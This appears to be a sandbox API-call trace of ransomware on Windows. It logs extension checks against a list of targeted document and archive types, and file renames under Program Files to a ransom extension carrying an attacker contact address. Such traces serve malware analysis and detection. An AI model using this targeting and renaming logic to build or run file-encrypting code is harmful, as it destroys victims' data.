lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui") returned 72 [0158.023] lstrlenW (lpString=".dbf") returned 4 [0158.023] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0158.023] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui") returned 72 [0158.023] lstrlenW (lpString=".1cd") returned 4 [0158.023] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0158.023] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui") returned 72 [0158.023] lstrlenW (lpString=".jpg") returned 4 [0158.023] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0158.023] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui") returned 72 [0158.023] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui") returned 72 [0158.023] lstrlenW (lpString=".doc") returned 4 [0158.023] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0158.023] lstrlenW (lpString=".docx") returned 5 [0158.023] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0158.023] lstrlenW (lpString=".pdf") returned 4 [0158.023] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0158.024] lstrlenW (lpString=".xls") returned 4 [0158.024] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0158.024] lstrlenW (lpString=".xlsx") returned 5 [0158.024] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0158.024] lstrlenW (lpString=".ppt") returned 4 [0158.024] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0158.024] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui") returned 72 [0158.024] lstrlenW (lpString=".zip") returned 4 [0158.024] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0158.024] lstrlenW (lpString=".rar") returned 4 [0158.024] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0158.024] lstrlenW (lpString=".bz2") returned 4 [0158.024] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0158.024] lstrlenW (lpString=".7z") returned 3 [0158.024] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0158.024] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui") returned 72 [0158.024] lstrlenW (lpString=".dbf") returned 4 [0158.024] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0158.024] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui") returned 72 [0158.024] lstrlenW (lpString=".1cd") returned 4 [0158.024] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0158.024] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui") returned 72 [0158.024] lstrlenW (lpString=".jpg") returned 4 [0158.024] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0158.024] lstrcmpiW (lpString1=".mui", lpString2=".bat") returned 1 [0158.025] lstrlenW (lpString="msader15.dll.mui") returned 16 [0158.025] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\msader15.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0158.026] GetFileSizeEx (in: hFile=0x424, lpFileSize=0x317ff14 | out: lpFileSize=0x317ff14*=17920) returned 1 [0158.026] CloseHandle (hObject=0x424) returned 1 [0158.026] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\msader15.dll.mui")) returned 0x20 [0158.026] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\msader15.dll.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0158.026] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\msader15.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.026] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 63 [0158.026] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 63 [0158.026] lstrlenW (lpString=".doc") returned 4 [0158.026] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0158.026] lstrlenW (lpString=".docx") returned 5 [0158.026] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0158.026] lstrlenW (lpString=".pdf") returned 4 [0158.026] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0158.026] lstrlenW (lpString=".xls") returned 4 [0158.026] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0158.027] lstrlenW (lpString=".xlsx") returned 5 [0158.027] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0158.027] lstrlenW (lpString=".ppt") returned 4 [0158.027] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0158.027] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 63 [0158.027] lstrlenW (lpString=".zip") returned 4 [0158.027] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0158.027] lstrlenW (lpString=".rar") returned 4 [0158.027] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0158.027] lstrlenW (lpString=".bz2") returned 4 [0158.027] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0158.027] lstrlenW (lpString=".7z") returned 3 [0158.027] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0158.027] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 63 [0158.027] lstrlenW (lpString=".dbf") returned 4 [0158.027] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0158.027] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 63 [0158.027] lstrlenW (lpString=".1cd") returned 4 [0158.027] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0158.027] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 63 [0158.027] lstrlenW (lpString=".jpg") returned 4 [0158.027] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0158.027] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 63 [0158.027] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 63 [0158.027] lstrlenW (lpString=".doc") returned 4 [0158.027] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0158.027] lstrlenW (lpString=".docx") returned 5 [0158.027] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0158.028] lstrlenW (lpString=".pdf") returned 4 [0158.028] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0158.028] lstrlenW (lpString=".xls") returned 4 [0158.028] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0158.028] lstrlenW (lpString=".xlsx") returned 5 [0158.028] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0158.028] lstrlenW (lpString=".ppt") returned 4 [0158.028] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0158.028] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 63 [0158.028] lstrlenW (lpString=".zip") returned 4 [0158.028] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0158.028] lstrlenW (lpString=".rar") returned 4 [0158.028] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0158.028] lstrlenW (lpString=".bz2") returned 4 [0158.028] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0158.028] lstrlenW (lpString=".7z") returned 3 [0158.028] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0158.028] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 63 [0158.028] lstrlenW (lpString=".dbf") returned 4 [0158.028] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0158.028] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 63 [0158.028] lstrlenW (lpString=".1cd") returned 4 [0158.028] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0158.028] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 63 [0158.028] lstrlenW (lpString=".jpg") returned 4 [0158.028] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0158.029] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0158.029] lstrlenW (lpString="msader15.dll") returned 12 [0158.029] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msader15.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0158.029] GetFileSizeEx (in: hFile=0x424, lpFileSize=0x317ff14 | out: lpFileSize=0x317ff14*=2560) returned 1 [0158.029] CloseHandle (hObject=0x424) returned 1 [0158.030] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msader15.dll")) returned 0x20 [0158.030] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\system\\ado\\msader15.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0158.030] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msader15.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.030] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 53 [0158.030] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 53 [0158.030] lstrlenW (lpString=".doc") returned 4 [0158.030] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0158.030] lstrlenW (lpString=".docx") returned 5 [0158.030] lstrcmpiW (lpString1=".docx", lpString2="5.dll") returned -1 [0158.030] lstrlenW (lpString=".pdf") returned 4 [0158.030] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0158.030] lstrlenW (lpString=".xls") returned 4 [0158.030] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0158.030] lstrlenW (lpString=".xlsx") returned 5 [0158.030] lstrcmpiW (lpString1=".xlsx", lpString2="5.dll") returned -1 [0158.030] lstrlenW (lpString=".ppt") returned 4 [0158.030] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0158.030] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 53 [0158.030] lstrlenW (lpString=".zip") returned 4 [0158.030] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0158.030] lstrlenW (lpString=".rar") returned 4 [0158.030] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0158.030] lstrlenW (lpString=".bz2") returned 4 [0158.030] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0158.030] lstrlenW (lpString=".7z") returned 3 [0158.030] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0158.030] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 53 [0158.030] lstrlenW (lpString=".dbf") returned 4 [0158.030] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0158.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 53 [0158.031] lstrlenW (lpString=".1cd") returned 4 [0158.031] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0158.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 53 [0158.031] lstrlenW (lpString=".jpg") returned 4 [0158.031] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0158.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 53 [0158.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 53 [0158.031] lstrlenW (lpString=".doc") returned 4 [0158.031] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0158.031] lstrlenW (lpString=".docx") returned 5 [0158.031] lstrcmpiW (lpString1=".docx", lpString2="5.dll") returned -1 [0158.031] lstrlenW (lpString=".pdf") returned 4 [0158.031] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0158.031] lstrlenW (lpString=".xls") returned 4 [0158.031] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0158.031] lstrlenW (lpString=".xlsx") returned 5 [0158.031] lstrcmpiW (lpString1=".xlsx", lpString2="5.dll") returned -1 [0158.031] lstrlenW (lpString=".ppt") returned 4 [0158.031] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0158.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 53 [0158.031] lstrlenW (lpString=".zip") returned 4 [0158.031] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0158.031] lstrlenW (lpString=".rar") returned 4 [0158.031] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0158.031] lstrlenW (lpString=".bz2") returned 4 [0158.031] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0158.031] lstrlenW (lpString=".7z") returned 3 [0158.031] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0158.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 53 [0158.031] lstrlenW (lpString=".dbf") returned 4 [0158.031] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0158.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 53 [0158.031] lstrlenW (lpString=".1cd") returned 4 [0158.031] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0158.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 53 [0158.032] lstrlenW (lpString=".jpg") returned 4 [0158.032] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0158.032] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0158.032] lstrlenW (lpString="msado15.dll") returned 11 [0158.032] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msado15.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0158.033] GetFileSizeEx (in: hFile=0x424, lpFileSize=0x317ff14 | out: lpFileSize=0x317ff14*=1233920) returned 1 [0158.033] CloseHandle (hObject=0x424) returned 1 [0158.033] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msado15.dll")) returned 0x20 [0158.033] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\system\\ado\\msado15.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0158.033] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msado15.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.033] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll") returned 52 [0158.033] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll") returned 52 [0158.033] lstrlenW (lpString=".doc") returned 4 [0158.033] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0158.033] lstrlenW (lpString=".docx") returned 5 [0158.033] lstrcmpiW (lpString1=".docx", lpString2="5.dll") returned -1 [0158.033] lstrlenW (lpString=".pdf") returned 4 [0158.033] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0158.033] lstrlenW (lpString=".xls") returned 4 [0158.033] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0158.033] lstrlenW (lpString=".xlsx") returned 5 [0158.033] lstrcmpiW (lpString1=".xlsx", lpString2="5.dll") returned -1 [0158.033] lstrlenW (lpString=".ppt") returned 4 [0158.033] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0158.033] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll") returned 52 [0158.033] lstrlenW (lpString=".zip") returned 4 [0158.033] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0158.033] lstrlenW (lpString=".rar") returned 4 [0158.033] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0158.034] lstrlenW (lpString=".bz2") returned 4 [0158.034] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0158.034] lstrlenW (lpString=".7z") returned 3 [0158.034] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0158.034] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll") returned 52 [0158.588] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\jvm.dll"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\jvm.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0158.599] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.599] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.599] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\copyright.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.599] CloseHandle (hObject=0x440) returned 1 [0158.603] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.603] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.603] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\accessibility.properties.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.603] CloseHandle (hObject=0x440) returned 1 [0158.604] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.604] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.604] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.604] CloseHandle (hObject=0x440) returned 1 [0158.605] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.605] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.605] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\calendars.properties.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.606] CloseHandle (hObject=0x440) returned 1 [0158.607] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\charsets.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\charsets.jar.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0158.608] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.608] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.608] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\classlist.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.608] CloseHandle (hObject=0x440) returned 1 [0158.609] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.609] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.609] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\ciexyz.pf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.609] CloseHandle (hObject=0x440) returned 1 [0158.610] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.610] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.610] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\gray.pf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.611] CloseHandle (hObject=0x440) returned 1 [0158.619] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.619] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.619] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\linear_rgb.pf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.619] CloseHandle (hObject=0x440) returned 1 [0158.620] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.620] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.620] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\content-types.properties.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.621] CloseHandle (hObject=0x440) returned 1 [0158.622] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.622] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.622] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\currency.data.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.622] CloseHandle (hObject=0x440) returned 1 [0158.634] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.634] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.634] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages.properties.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.634] CloseHandle (hObject=0x450) returned 1 